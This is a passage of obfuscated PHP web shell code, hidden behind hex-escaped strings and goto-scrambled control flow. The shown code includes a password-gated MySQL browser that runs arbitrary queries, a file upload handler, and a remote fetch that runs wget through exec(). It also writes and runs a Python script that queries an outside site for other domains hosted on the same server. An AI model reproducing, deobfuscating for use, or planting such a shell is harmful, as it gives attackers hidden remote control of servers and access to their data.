grab($_POST["\x72\x65\x6d"]); } if ($_FILES["\x75\160"]) { up($_FILES["\x75\x70"]); } } goto zl_Zn; T0ekR: function sql() { session_start(); if (!$_GET["\x73\x71\154\x66"]) { style(); } if ($_POST["\x75\156"] && $_POST["\160\x77"]) { $_SESSION["\x73\x71\x6c\137\165\x73\145\162"] = $_POST["\x75\x6e"]; $_SESSION["\163\161\154\x5f\x70\141\163\163\167\x6f\x72\144"] = $_POST["\x70\x77"]; } if ($_POST["\150\157\163\x74"]) { $_SESSION["\x73\161\154\x5f\150\x6f\163\x74"] = $_POST["\x68\157\163\x74"]; } else { $_SESSION["\163\161\x6c\137\x68\157\163\x74"] = "\x6c\157\143\141\154\x68\x6f\x73\x74"; } if ($_POST["\160\157\162\164"]) { $_SESSION["\x73\x71\154\x5f\160\157\x72\x74"] = $_POST["\160\x6f\x72\x74"]; } else { $_SESSION["\x73\161\x6c\137\x70\x6f\162\164"] = "\63\x33\60\x36"; } if ($_SESSION["\163\161\x6c\137\165\x73\145\x72"] && $_SESSION["\163\x71\154\137\x70\141\163\x73\167\157\x72\x64"]) { if (!($sqlcon = @mysql_connect($_SESSION["\163\161\154\137\x68\x6f\x73\x74"] . "\72" . $_SESSION["\163\x71\154\x5f\x70\157\162\164"], $_SESSION["\x73\x71\154\x5f\x75\163\145\162"], $_SESSION["\x73\161\x6c\x5f\x70\141\x73\x73\x77\x6f\162\x64"]))) { unset($_SESSION["\x73\x71\x6c\x5f\x75\163\145\162"], $_SESSION["\163\x71\x6c\137\160\141\163\x73\167\157\x72\144"], $_SESSION["\x73\x71\x6c\x5f\x68\157\163\x74"], $_SESSION["\x73\161\154\137\160\157\162\x74"]); echo "\111\x6e\x76\141\154\x69\x64\x20\143\162\x65\x64\145\156\x74\x69\x61\x6c\163\74\x62\x72\76\12"; die(sqllogin()); } else { $_SESSION["\x69\163\154\157\147\147\x65\x64\151\156"] = "\164\162\x75\145"; } } else { die(sqllogin()); } if ($_GET["\144\x62"]) { mysql_select_db($_GET["\144\142"], $sqlcon); if ($_GET["\163\x71\154\161\x75\x65\x72\x79"]) { $dat = mysql_query($_GET["\x73\161\154\161\165\145\162\x79"], $sqlcon) or die(mysql_error()); $num = mysql_num_rows($dat); for ($i = 0; $i < $num; $i++) { echo mysql_result($dat, $i) . "\74\142\x72\x3e\12"; } } else { if ($_GET["\164\141\x62\154\x65"] && !$_GET["\163\x71\x6c\x66"]) { echo "\x3c\141\x20\x68\162\145\146\x3d\x27\77\x61\143\x74\75\163\x71\154\x26\x64\x62\75" . $_GET["\144\142"] . "\x26\164\x61\142\x6c\x65\75" . $_GET["\164\x61\142\154\x65"] . "\46\x73\x71\154\x66\75\151\x6e\x73\47\76\111\x6e\x73\x65\162\164\x20\122\157\x77\74\x2f\x61\76\74\x62\x72\x3e\x3c\142\162\x3e\12"; echo "\74\164\x61\142\154\145\x20\142\x6f\162\x64\145\x72\75\47\x31\x27\x3e"; $query = "\123\x48\x4f\127\40\103\x4f\114\125\x4d\x4e\x53\40\106\x52\x4f\x4d\x20" . $_GET["\x74\141\x62\x6c\145"]; $result = mysql_query($query, $sqlcon) or die(mysql_error()); $i = 0; $fields = array(); while ($row = mysql_fetch_assoc($result)) { array_push($fields, $row["\106\x69\x65\x6c\144"]); echo "\74\164\x68\x3e" . $fields[$i]; $i++; } $result = mysql_query("\x53\x45\114\x45\x43\124\x20\x2a\40\106\122\117\x4d\x20" . $_GET["\x74\141\142\x6c\145"], $sqlcon) or die(mysql_error()); $num_rows = mysql_num_rows($result) or die(mysql_error()); $y = 0; for ($x = 1; $x <= $num_rows + 1; $x++) { if (!$_GET["\x70"]) { $_GET["\160"] = 1; } if ($_GET["\x70"]) { if ($y > 30 * ($_GET["\x70"] - 1) && $y <= 30 * $_GET["\160"]) { echo "\74\x74\162\76"; for ($i = 0; $i < count($fields); $i++) { $query = "\123\105\x4c\105\x43\124\40" . $fields[$i] . "\40\106\x52\117\x4d\x20" . $_GET["\164\x61\142\154\145"] . "\x20\x57\110\x45\122\x45\x20" . $fields[0] . "\x20\75\x20\47" . $x . "\47"; $dat = mysql_query($query, $sqlcon) or die(mysql_error()); while ($row = mysql_fetch_row($dat)) { echo "\74\x74\144\x3e" . $row[0] . "\74\57\164\x64\76"; } } echo "\x3c\57\164\x72\x3e\12"; } } $y++; } echo "\74\x2f\x74\141\142\x6c\x65\76\12"; for ($z = 1; $z <= ceil($num_rows / 30); $z++) { echo "\74\141\x20\x68\162\x65\x66\x3d\47\x3f\x61\x63\164\75\163\161\x6c\46\144\x62\75" . $_GET["\144\x62"] . "\x26\164\141\x62\x6c\x65\x3d" . $_GET["\164\x61\x62\x6c\145"] . "\x26\160\x3d" . $z . "\x27\x3e" . $z . "\74\57\x61\x3e\x20\174\40"; } } elseif ($_GET["\164\x61\142\154\x65"] && $_GET["\x73\x71\x6c\x66"]) { switch ($_GET["\x73\161\154\146"]) { case "\x64\x6c": sqldownload(); break; case "\x69\x6e\163": sqlinsert(); break; default: $_GET["\x73\x71\x6c\146"] = ''; } } else { echo "\74\164\141\x62\154\145\x3e"; $query = "\123\x48\x4f\127\x20\124\x41\x42\x4c\x45\123\40\x46\x52\117\115\40" . $_GET["\144\142"]; $dat = mysql_query($query, $sqlcon) or die(mysql_error()); while ($row = mysql_fetch_row($dat)) { echo "\74\164\162\x3e\74\x74\x64\76\74\141\40\x68\x72\x65\146\x3d\47\77\x61\x63\x74\x3d\x73\x71\x6c\46\x64\142\75" . $_GET["\x64\142"] . "\x26\x74\x61\x62\x6c\145\x3d" . $row[0] . "\47\x3e" . $row[0] . "\74\57\141\76\x3c\x2f\164\x64\76\x3c\164\x64\x3e\133\74\141\40\x68\x72\145\146\x3d\47\x3f\141\143\164\75\163\161\154\x26\144\x62\75" . $_GET["\x64\x62"] . "\46\x74\141\x62\x6c\145\75" . $row[0] . "\x26\163\x71\154\x66\75\x64\154\x27\76\x44\x6f\x77\156\154\x6f\x61\x64\x3c\57\141\x3e\x5d\74\57\164\144\76\x3c\57\x74\162\x3e\12"; } echo "\x3c\57\164\x61\x62\154\x65\76"; } } } else { $dbs = mysql_list_dbs($sqlcon); while ($row = mysql_fetch_object($dbs)) { echo "\x3c\x61\40\x68\162\x65\x66\75\47\x3f\141\143\x74\75\163\x71\x6c\x26\x64\x62\75" . $row->Database . "\47\x3e" . $row->Database . "\74\x2f\x61\76\74\142\162\x3e\xa"; } } mysql_close($sqlcon); } goto qub4z; Re6QC: $uname = php_uname(); goto cAlhs; YaNTc: $pass = "\64\67\145\63\x33\61\x64\62\x62\70\x64\60\x37\64\66\x35\65\61\65\143\x35\60\143\x62\60\146\141\x64\x31\145\65\141"; goto zSPz2; WHdb0: $gf = $_POST["\x67\146"]; goto TNDAO; d1uen: die; goto IEiE7; AB80q: function img($img) { $images = array("\146\x6f\x6c\144\x65\162" => "\x52\x30\x6c\107\117\104\x6c\150\x45\x77\x41\x51\x41\x4c\x4d\x41\x41\101\101\101\x41\x50\57\57\57\65\171\x63\x41\115\67\x4f\131\57\x2f\x2f\156\120\57\x2f\172\x76\57\x4f\x6e\120\146\x33\71\x2f\57\57\x2f\167\101\101\x41\101\x41\101\x41\x41\101\x41\101\x41\x41\x41\x41\x41\101\x41\101\101\x41\101\x41\x41\101\101\101\x43\x48\65\x42\x41\105\x41\101\101" . "\147\x41\x4c\x41\x41\101\x41\101\101\x54\x41\102\x41\x41\101\101\122\x52\105\x4d\154\x4a\161\x37\60\x34\x36\171\160\66\x42\170\x73\151\x48\x45\x56\x42\x45\101\x4b\131\103\125\120\162\104\160\x37\110\x6c\130\x52\x64\105\x6f\115\161\103\x65\142\x70\x2f\x34\131\143\x68\x66\146\x7a\107\121\x68\x48\64\x59\122\131\120\x42\x32\x44\x4f\154\110\x50\151\113\167\x71" . "\x64\61\120\x71\x38\171\x72\x56\126\147\63\x51\131\145\110\65\x52\x59\113\65\x72\x4a\x66\141\x46\x55\125\101\63\166\x42\x34\x66\x42\111\x42\101\x44\x73\x3d", "\151\x6d\141\x67\x65" => "\x52\60\x6c\107\x4f\104\154\x68\x46\101\101\127\x41\x4f\115\101\x41\120\57\57\57\x2f\70\x7a\x4d\70\x7a\x2f\57\x38\x7a\x4d\x7a\112\155\x5a\x6d\x57\132\155\132\155\x59\x41\101\x44\x4d\x7a\x4d\x77\103\x5a\x7a\x41\x43\x5a\x4d\x77\101\172\x5a\x67\x41\101\x41\101\101\101\x41\101\x41\101\x41\x41\x41\101\x41\x41\101\x41\101\x43\110\x2b\x54\154\x52\x6f\x61\x58" . "\115\147\131\130\x4a\60\x49\x47\x6c\x7a\111\x47\x6c\165\x49\110\122\x6f\132\123\102\167\x64\127\112\163\141\x57\x4d\x67\132\x47\71\164\x59\x57\x6c\165\114\151\102\114\132\x58\x5a\160\142\x69\x42\111\144\127\144\157\132\130\x4d\163\x49\x47\x74\x6c\x64\155\x6c\x75\141\105\102\154\x61\x58\121\165\131\x32\x39\164\x4c\x43\102\124\132\130\102\x30\132\127\61\x69" . "\132\x58\x49\x67\x4d\124\153\65\x4e\x51\x41\x68\x2b\121\x51\x42\x41\101\101\x43\101\103\167\101\101\x41\x41\101\x46\101\x41\127\101\x41\x41\105\153\120\104\x49\x53\141\x65\x34\127\102\172\101\165\x39\71\110\x64\x6d\x31\x65\x53\x59\x59\x5a\127\130\131\161\117\147\x4a\x42\114\101\x63\x44\x6f\x4e\x72\131\x4e\163\x73\107\163\102\171\57\x34\107\163\130\66\x79" . "\x32\117\x79\x4d\x57\x51\62\x4f\115\121\x6e\147\x53\154\102\x6a\132\114\127\102\x4d\61\101\106\123\161\153\x79\125\x34\x41\x32\x74\x57\171\x77\125\115\x59\164\57\x77\x6c\124\x53\x49\x76\147\131\107\101\57\x5a\x71\63\121\167\125\67\155\x6d\x48\x76\x68\64\147\x38\x47\125\163\x66\x41\125\110\103\x48\71\65\x4e\167\115\110\x56\x34\123\x47\150\x34\x45\x64" . "\151\x68\x4f\117\152\x79\x38\162\x5a\160\x53\x56\x65\151\x56\x2b\155\131\x43\127\110\156\143\113\x6f\66\x53\x66\x6d\x35\x63\x6c\151\x41\x64\121\x72\113\x31\120\121\x42\x6c\x4a\163\162\x4e\x53\x45\x51\101\x37", "\x75\156\x6b\x6e\x6f\167\x6e" => "\122\x30\154\107\x4f\x44\154\x68\106\101\101\x57\x41\x4d\x49\101\101\120\57\57\57\70\172\57\57\x35\155\132\x6d\124\115\172\x4d\167\101\x41\101\x41\x41\x41\x41\x41\x41\x41\x41\101\x41\x41\x41\x43\110\53\x54\x6c\122\x6f\141\x58\x4d\147\131\x58\112\x30\111\107\154\x7a\x49\107\154\165\111\110\122\x6f\x5a\x53\102\167\144\127\x4a\163\141\x57\x4d\147\132\107" . "\71\164\131\x57\x6c\x75\x4c\x69\x42\114\132\130\132\160\142\151\x42\x49\x64\127\144\x6f\132\130\x4d\x73\x49\x47\x74\154\144\x6d\154\x75\141\x45\x42\x6c\141\x58\x51\x75\x59\x32\71\x74\114\103\x42\x54\x5a\130\102\x30\x5a\127\x31\151\132\x58\x49\x67\x4d\x54\x6b\65\116\121\x41\150\x2b\121\121\x42\x41\101\101\x42\x41\103\x77\x41\x41\101\x41\x41\x46\x41\101\127" . "\101\101\101\x44\x61\x44\151\x36\166\x50\105\x77\104\x45\x43\162\x6e\x53\x4f\53\141\x54\x76\x50\x45\121\x63\x49\x41\155\107\x61\111\x72\150\122\x35\130\155\113\x67\115\161\61\x4c\x6b\157\115\x4e\x37\105\x43\162\152\x44\x57\160\x35\x32\x72\60\151\120\x70\x4a\x4a\x30\x4b\152\125\101\161\x37\123\170\x4c\105\53\163\x49\53\x39\126\x38\x76\171\143\x46\151\x4d" . "\x30\151\114\x62\x32\117\x38\x30\163\70\x4a\143\x66\126\112\112\x54\141\107\x59\x72\x5a\x59\120\116\x62\171\65\117\x76\x36\x57\x6f\x6c\120\x44\53\x58\x44\x4a\161\101\147\x53\121\64\105\x55\103\107\121\121\x45\x4a\101\104\x73\x3d", "\x62\x69\x6e\x61\162\x79" => "\x52\x30\x6c\x47\x4f\x44\x6c\x68\106\x41\101\127\x41\115\x49\x41\101\120\57\x2f\x2f\x38\172\x2f\57\70\172\x4d\172\x4a\x6d\x5a\155\x54\x4d\172\x4d\167\101\101\x41\101\101\101\x41\101\x41\101\101\x43\110\53\124\154\x52\157\141\x58\x4d\x67\x59\130\x4a\60\111\107\x6c\172\111\107\154\x75\x49\x48\x52\x6f\132\x53\x42\167\144\127\x4a\163\x61\x57\x4d\147\132\x47" . "\71\164\131\x57\154\x75\x4c\x69\102\114\132\130\x5a\x70\x62\151\x42\111\144\127\x64\x6f\132\x58\115\163\111\107\x74\154\144\155\x6c\x75\141\105\102\x6c\141\130\x51\165\131\x32\71\x74\x4c\103\102\x54\x5a\x58\x42\60\x5a\127\61\151\132\x58\111\x67\x4d\x54\153\x35\116\121\101\x68\53\121\x51\102\101\x41\x41\102\x41\103\167\x41\x41\x41\101\101\x46\x41\x41\127" . "\101\101\x41\x44\141\x55\151\66\x76\120\x45\167\105\x45\103\162\156\x53\x53\53\127\121\x6f\121\x58\123\x45\101\x45\x36\154\x78\x58\x67\145\157\160\121\155\x68\x61\53\x71\x31\x72\150\x54\146\141\x6b\x48\157\x2f\x48\x61\104\x6e\126\106\x6f\66\x4c\x4d\131\113\x59\120\153\157\117\x41\104\x69\155\x34\126\x4a\x64\117\x57\x6b\x78\x32\130\166\x69\162\125\x67\x71" . "\x56\141\x56\143\x62\x75\x78\x43\x6e\60\150\113\145\60\x34\172\x6e\162\x49\x56\x2f\x52\117\x4f\166\141\107\x33\x2b\x7a\66\63\117\131\x4f\x36\x2f\x75\x69\167\x6c\113\147\x59\x4a\112\117\170\x46\x44\x68\x34\x68\124\103\121\101\x37", "\x74\145\170\x74" => "\x52\60\x6c\107\117\104\x6c\150\106\101\101\x57\x41\x4f\115\101\x41\120\x2f\x2f\57\x2f\57\x4d\115\x2f\70\x7a\115\x38\172\57\57\65\155\132\155\x5a\x6c\x6d\x4d\62\x62\x4d\x2f\172\x4d\172\115\x77\x41\101\101\x41\101\x41\x41\x41\101\101\101\101\x41\x41\x41\101\101\101\101\101\x41\101\101\x41\x41\101\101\x41\101\101\x41\x43\x48\x2b\124\154\122\157\141\130" . "\115\x67\x59\x58\112\x30\x49\x47\154\x7a\x49\107\154\x75\x49\110\122\x6f\x5a\x53\x42\x77\144\x57\112\163\141\127\115\x67\x5a\x47\x39\x74\131\x57\x6c\x75\114\151\x42\114\x5a\130\132\160\142\x69\102\111\144\x57\144\x6f\132\130\115\x73\111\x47\x74\x6c\144\x6d\x6c\x75\x61\x45\102\x6c\141\130\x51\x75\131\62\x39\164\x4c\103\x42\124\x5a\x58\x42\x30\132\x57\x31\151" . "\x5a\x58\111\x67\x4d\x54\x6b\65\116\121\101\150\x2b\121\121\x42\101\101\x41\x44\101\x43\x77\x41\101\x41\x41\101\106\101\101\x57\x41\x41\101\x45\142\x2f\x44\111\x53\x65\x65\x34\145\102\172\x41\165\71\71\110\x64\155\x31\145\123\131\142\x5a\x57\130\105\x6b\147\x49\65\x73\x45\102\x67\x30\53\62\x48\156\x54\102\163\143\x63\x76\x68\101\155\107\x74\130\x41\171" . "\x43\x4f\123\x49\x54\x77\x55\x47\x67\x32\x50\x59\x51\157\121\x61\154\x68\117\x5a\57\121\x4b\114\126\x56\x36\x67\x4b\x6d\x51\155\70\x58\x58\104\125\x6d\172\170\60\x79\126\65\x7a\145\71\163\x37\x4a\144\x70\147\164\x4c\x33\115\x45\x35\152\150\x48\124\x53\57\170\x4f\x33\x68\x77\144\x57\164\x30\x66\63\x31\67\127\x77\x64\123\x69\x34\170\122\x50\170\x6c\167" . "\x6b\x55\x67\130\105\x51\x41\67", "\x63\157\155\160\162\145\x73\163\145\144" => "\x52\x30\154\x47\117\x44\x6c\150\106\101\101\x57\101\x4f\143\101\101\x50\57\x2f\57\x2f\x2f\x2f\172\120\x2f\x2f\155\146\57\x2f\x5a\x76\57\x2f\x4d\57\57\x2f\101\120\x2f\115\x2f\57\x2f\115\x7a\x50\x2f\x4d\x6d\x66\57\x4d\132\x76\57\115\115\x2f\57\x4d\x41\x50\53\132\x2f\x2f\53\132\x7a\120\x2b\x5a\155\x66\53\x5a\x5a\x76\x2b\x5a\115\57\x2b\x5a\101\x50" . "\x39\155\57\57\71\x6d\x7a\x50\x39\x6d\x6d\146\x39\x6d\x5a\166\x39\155\115\x2f\71\155\x41\x50\70\x7a\x2f\x2f\x38\x7a\x7a\120\x38\172\x6d\146\70\172\132\x76\x38\x7a\115\57\70\x7a\x41\120\70\101\x2f\x2f\x38\101\172\x50\x38\x41\155\146\70\101\x5a\166\x38\101\115\57\70\x41\101\115\x7a\x2f\x2f\70\x7a\x2f\x7a\115\172\x2f\155\x63\172\x2f\132\163\172\57" . "\115\70\172\57\x41\115\x7a\115\57\70\172\115\x7a\115\x7a\115\x6d\143\x7a\x4d\x5a\163\x7a\x4d\115\x38\x7a\115\101\x4d\x79\132\x2f\x38\x79\x5a\x7a\115\x79\x5a\x6d\x63\171\132\132\x73\171\132\115\x38\171\132\x41\115\x78\155\x2f\x38\x78\155\172\x4d\x78\x6d\x6d\143\x78\155\x5a\x73\170\155\115\x38\170\x6d\101\x4d\x77\x7a\x2f\x38\167\x7a\x7a\115\x77\172\x6d\x63" . "\x77\x7a\x5a\163\x77\172\x4d\x38\167\172\101\115\167\101\x2f\70\x77\x41\172\x4d\x77\x41\155\143\167\x41\x5a\x73\x77\x41\x4d\70\167\101\101\112\x6e\x2f\57\65\x6e\57\x7a\112\x6e\x2f\x6d\x5a\x6e\x2f\x5a\x70\156\57\x4d\65\x6e\x2f\x41\112\x6e\115\x2f\x35\x6e\115\x7a\x4a\156\x4d\x6d\132\x6e\x4d\x5a\x70\156\115\115\65\x6e\x4d\101\x4a\155\x5a\x2f\65\x6d\132" . "\172\x4a\155\132\x6d\x5a\155\x5a\132\160\155\132\x4d\x35\x6d\x5a\101\x4a\154\155\57\x35\154\155\172\112\x6c\x6d\x6d\x5a\x6c\x6d\132\160\154\x6d\x4d\65\x6c\x6d\x41\112\153\x7a\57\65\x6b\x7a\x7a\112\153\x7a\x6d\132\153\172\x5a\160\x6b\x7a\x4d\x35\x6b\x7a\x41\112\153\x41\x2f\65\x6b\101\x7a\112\x6b\101\155\132\x6b\x41\132\x70\x6b\101\x4d\65\x6b\x41\x41\107" . "\142\57\57\x32\142\57\172\107\x62\57\155\x57\142\x2f\x5a\155\142\57\x4d\62\x62\57\101\x47\142\115\x2f\x32\x62\x4d\172\107\x62\x4d\x6d\127\x62\115\x5a\155\142\115\x4d\62\x62\x4d\x41\x47\x61\132\x2f\x32\141\132\172\x47\141\x5a\155\x57\141\132\x5a\x6d\x61\x5a\115\x32\141\132\x41\107\x5a\155\57\x32\x5a\155\x7a\107\x5a\155\x6d\127\x5a\155\x5a\155\x5a\155" . "\115\62\x5a\155\x41\107\131\172\x2f\62\131\x7a\x7a\x47\131\172\155\x57\131\x7a\x5a\x6d\x59\172\115\x32\x59\x7a\x41\x47\131\x41\x2f\62\131\101\172\x47\x59\101\x6d\x57\x59\101\x5a\155\131\x41\115\62\131\101\101\x44\x50\57\57\x7a\x50\57\x7a\x44\x50\x2f\x6d\x54\120\x2f\132\152\x50\57\x4d\x7a\120\57\101\x44\x50\115\57\172\120\115\x7a\104\x50\x4d\155\x54" . "\x50\x4d\132\152\x50\115\x4d\172\120\115\x41\x44\117\132\57\x7a\x4f\x5a\x7a\x44\117\x5a\x6d\x54\117\x5a\132\x6a\117\x5a\x4d\x7a\117\x5a\101\104\x4e\155\57\x7a\x4e\x6d\172\x44\x4e\155\155\124\116\155\132\152\116\x6d\x4d\x7a\x4e\x6d\x41\x44\115\172\x2f\172\115\x7a\172\x44\x4d\x7a\155\x54\x4d\x7a\132\152\115\172\115\172\x4d\x7a\x41\104\x4d\101\57\x7a\x4d\101" . "\172\x44\x4d\101\x6d\x54\115\x41\132\x6a\x4d\x41\115\x7a\115\101\101\x41\x44\57\x2f\x77\104\57\x7a\101\104\x2f\155\x51\x44\x2f\132\x67\104\x2f\115\x77\x44\x2f\101\x41\x44\x4d\57\x77\x44\115\x7a\101\x44\115\x6d\121\x44\x4d\x5a\147\104\x4d\115\x77\x44\115\x41\101\103\x5a\57\x77\103\132\x7a\101\x43\132\155\x51\103\x5a\x5a\147\x43\x5a\115\167\x43\132\x41\x41" . "\x42\155\x2f\167\x42\x6d\x7a\x41\x42\155\x6d\121\x42\x6d\132\147\102\x6d\115\x77\102\155\101\x41\101\x7a\57\167\x41\x7a\x7a\x41\x41\172\x6d\121\x41\172\132\x67\101\172\115\167\x41\x7a\101\x41\101\101\x2f\167\101\101\x7a\x41\101\101\155\121\x41\x41\x5a\x67\101\101\115\x2b\64\x41\101\116\x30\101\101\114\163\x41\101\x4b\157\x41\x41\111\x67\x41\x41\110\x63\101" . "\x41\106\125\x41\x41\105\x51\101\101\103\111\x41\101\x42\105\x41\x41\x41\104\165\x41\101\104\144\101\x41\103\x37\x41\x41\103\x71\101\101\103\111\101\x41\x42\63\x41\101\x42\126\101\101\x42\105\101\101\x41\151\101\x41\x41\122\101\x41\101\101\x37\147\101\x41\x33\x51\101\101\x75\x77\101\x41\161\147\101\101\151\101\101\101\x64\167\101\101\x56\x51\101\101\122\101" . "\101\x41\111\x67\x41\101\x45\x65\67\x75\x37\164\x33\144\63\x62\x75\67\165\66\x71\x71\x71\157\151\x49\151\x48\x64\x33\144\61\126\126\126\x55\x52\105\122\103\x49\151\x49\x68\x45\x52\105\x51\101\101\101\x43\110\x2b\124\154\122\x6f\141\130\115\x67\x59\130\x4a\60\111\x47\154\172\x49\x47\x6c\165\111\110\122\157\132\123\102\x77\x64\127\x4a\x73\141\127\x4d\x67" . "\132\107\x39\x74\x59\x57\154\165\114\x69\x42\114\x5a\130\132\x70\142\151\102\x49\x64\127\x64\x6f\x5a\130\115\163\x49\107\164\x6c\144\155\x6c\165\141\x45\x42\154\x61\x58\x51\x75\131\x32\71\x74\114\x43\x42\x54\x5a\x58\102\x30\132\127\x31\x69\x5a\x58\x49\x67\x4d\124\x6b\65\x4e\x51\101\150\53\121\x51\102\x41\x41\101\x6b\x41\103\x77\x41\101\x41\101\101\106\101" . "\101\127\x41\x41\101\x49\x6d\x51\102\112\x43\103\x54\102\x71\x6d\x44\x42\x67\x51\147\x54\x44\155\x51\106\x41\x41\x42\104\x56\x67\x6f\x6a\105\x6d\172\x49\60\x4b\110\x45\150\x42\125\162\127\162\167\157\115\x47\116\104\151\150\x77\x6e\101\166\x6a\x48\x69\161\x52\112\152\x68\130\x2f\161\126\172\65\x44\x2b\x56\110\x41\106\132\151\x57\155\x6d\x5a\70\x42\107\110" . "\152\151\x39\x68\170\x71\x54\x4a\64\x5a\x46\x41\155\172\143\x31\166\x70\170\x4a\x67\x6b\120\120\x6e\60\131\x35\103\x50\60\x34\x4d\66\x6c\120\x45\x6b\x43\116\65\155\x78\x6f\x4a\x65\x6c\122\x71\106\x59\x35\124\115\x33\66\116\107\162\x50\161\126\66\x37\x4f\x70\x30\x4b\115\x36\162\x59\156\x6b\x75\x70\57\x67\x4d\161\61\155\144\141\x6d\x43\61\x74\144\156" . "\63\66\154\x69\152\x55\x70\167\x6a\162\x30\x70\123\157\x46\171\125\x72\155\124\x4a\114\x68\151\124\102\x6b\x71\x58\x43\147\101\101\67", "\163\157\x75\x6e\144" => "\x52\60\154\x47\117\x44\x6c\150\x46\101\101\x57\101\115\111\x41\x41\120\57\x2f\57\57\70\172\x4d\70\172\57\57\70\172\115\x7a\112\x6d\x5a\x6d\x57\131\x41\x41\x44\x4d\x7a\115\167\x41\101\101\x43\x48\x2b\124\154\122\x6f\x61\130\x4d\147\131\x58\112\x30\x49\107\154\172\x49\x47\x6c\x75\111\110\x52\x6f\132\x53\x42\x77\x64\x57\x4a\x73\141\127\115\x67\132\107" . "\x39\164\131\x57\x6c\165\114\151\x42\x4c\x5a\x58\132\160\x62\x69\x42\x49\x64\127\x64\157\x5a\x58\115\x73\111\107\x74\154\144\155\x6c\x75\141\105\x42\154\141\x58\121\x75\x59\x32\71\x74\x4c\103\102\x54\x5a\x58\102\60\132\x57\61\x69\132\130\x49\147\115\x54\153\x35\x4e\x51\x41\x68\x2b\121\x51\102\x41\x41\x41\x43\101\103\167\101\101\x41\x41\101\106\x41\x41\127" . "\101\101\101\x44\141\171\151\66\63\120\64\x77\x4e\x73\116\103\153\117\x6f\x63\x59\x56\127\x50\x42\67\106\170\x46\x77\x6d\x46\167\x47\x68\x2b\x44\x5a\x70\x79\156\x6e\144\160\x4e\x41\x48\x63\127\71\143\126\x51\x55\152\70\x74\x74\x74\162\144\x2b\107\65\150\x4d\x49\116\124\67\101\x30\x42\160\x45\64\132\x6e\106\66\x68\x43\161\x6e\60\x69\x72\x79\113\x73" . "\x30\x53\104\116\71\x76\60\x74\123\143\60\121\x34\x44\x51\61\123\x48\106\122\x6a\x65\102\x72\x51\66\x46\x7a\x4e\116\65\103\x6f\62\x4a\x44\x34\x59\x66\125\160\x37\x47\156\x59\163\145\170\121\114\150\x42\x69\112\x69\x67\163\112\101\104\163\75", "\x73\143\162\x69\160\164" => "\x52\60\x6c\x47\x4f\104\x6c\150\x46\x41\101\x57\x41\115\x49\101\101\120\x2f\57\x2f\x38\172\x2f\x2f\65\x6d\132\155\x54\x4d\x7a\115\x77\x41\101\x41\101\x41\x41\x41\101\x41\x41\101\x41\101\101\x41\103\x48\53\124\154\x52\x6f\x61\x58\x4d\x67\131\x58\x4a\x30\111\107\x6c\172\x49\107\x6c\165\x49\x48\122\157\x5a\x53\x42\x77\144\127\112\x73\141\127\115\x67\x5a\x47" . "\x39\164\131\127\154\165\114\151\x42\114\x5a\x58\132\x70\x62\151\x42\x49\x64\x57\144\157\x5a\x58\x4d\x73\x49\x47\x74\x6c\x64\x6d\154\x75\141\105\102\x6c\x61\130\x51\x75\131\62\71\164\x4c\x43\x42\x54\x5a\130\x42\x30\132\127\61\x69\x5a\x58\x49\147\115\124\x6b\65\x4e\121\101\x68\x2b\121\x51\102\x41\101\x41\x42\101\x43\167\x41\101\101\x41\x41\106\101\101\127" . "\101\x41\x41\x44\x5a\x54\x69\66\x76\x50\105\x77\104\x45\x43\x72\156\123\117\53\141\124\166\120\x45\x64\144\126\x49\162\x68\x56\102\112\x43\x53\106\70\121\x52\x4d\111\167\x4f\102\105\62\x66\126\x4c\x72\155\x63\x59\x7a\x33\x4f\x34\x70\x67\113\x43\104\147\126\115\x67\122\x30\x53\147\x5a\x4f\x59\126\115\x30\x64\x4e\x53\x2f\x41\106\x37\x67\x47\x79\x31\155\x65" . "\61\x36\x76\x39\x76\130\x4e\x64\131\x4e\x66\x38\71\145\163\x32\157\x73\x30\x30\x62\x52\143\104\x57\x37\x44\126\x44\104\167\145\x38\67\x66\x6a\x4d\x67\53\166\x39\104\x4e\x78\x42\172\x59\167\x38\112\x41\104\163\x3d"); header("\x43\157\156\x74\145\x6e\x74\x2d\164\x79\160\x65\72\x20\151\x6d\141\147\x65\57\147\151\x66"); echo base64_decode($images[$img]); die; } goto oKKh5; ipa7I: $email = ''; goto eyRfb; j0T9v: function lookup() { style(); global $servinf; $script = "\x69\155\160\157\162\x74\x20\165\162\x6c\154\x69\x62\x2c\x20\x75\162\x6c\154\x69\142\62\x2c\x20\163\171\163\x2c\x20\162\x65\12\x20\40\162\145\x71\40\75\40\165\162\154\x6c\x69\142\62\56\122\145\x71\x75\x65\163\x74\x28\47\150\x74\164\160\x3a\57\x2f\167\x77\x77\x2e\x73\x65\x6f\x6c\x6f\147\x73\x2e\143\157\x6d\57\x69\x70\x2d\x64\157\x6d\x61\151\x6e\163\x2e\x68\x74\x6d\154\x27\x2c\40\165\162\154\x6c\x69\142\x2e\165\162\154\145\x6e\x63\x6f\x64\x65\x28\x7b\x27\x64\157\155\141\x69\156\x6e\141\x6d\145\x27\40\x3a\40\x73\x79\163\56\141\x72\x67\166\133\x31\135\175\x29\x29\xa\x20\x20\163\x69\x74\145\x20\75\x20\162\145\56\x66\x69\x6e\x64\x61\154\154\50\x27\x2e\53\134\51\40\x28\x2e\53\51\74\x62\162\x3e\47\54\x20\165\x72\154\x6c\x69\142\62\56\165\162\154\x6f\x70\145\156\50\162\x65\x71\x29\56\x72\145\x61\x64\50\51\51\xa\x20\x20\146\x6f\x72\40\x69\x20\151\x6e\x20\x78\x72\x61\x6e\x67\x65\x28\x30\54\x6c\145\156\50\x73\151\164\145\x29\x29\x3a\xa\40\40\40\40\160\x72\x69\x6e\164\x20\x73\x69\x74\x65\x5b\151\135"; $handle = fopen("\154\x6f\x6f\153\165\x70\x2e\x70\171", "\167"); fwrite($handle, $script); fclose($handle); echo "\74\x68\64\76\104\157\x6d\x61\151\156\x73\x3c\57\150\x34\x3e"; echo "\x3c\x75\154\76"; $cmd = exec("\x70\x79\x74\150\x6f\156\40\154\157\157\153\x75\x70\56\x70\171\x20" . $servinf[0], $ret); foreach ($ret as $site) { echo "\74\154\151\x3e" . $site . "\12"; } unlink("\154\157\x6f\153\x75\x70\x2e\x70\171"); } goto AB80q; a_aHJ: function grab($file) { style(); $updir = $_POST["\x6c\x6f\x63"]; $filex = array_pop(explode("\x2f", $file)); if (exec("\x77\x67\145\x74\40{$file}\40\x2d\142\40\x2d\x4f\40{$updir}\57{$filex}")) { die("\106\x69\x6c\145\x20\150\141\163\40\142\145\145\x6e\40\x75\160\154\157\x61\x64\x65\144\56"); } else { die("\106\151\154\x65\x20\165\160\x6c\157\141\x64\40\x66\141\151\154\145\144\56"); } } goto AXVDQ; ysBF_: session_start(); goto WLTYy; ulNOj: $act = 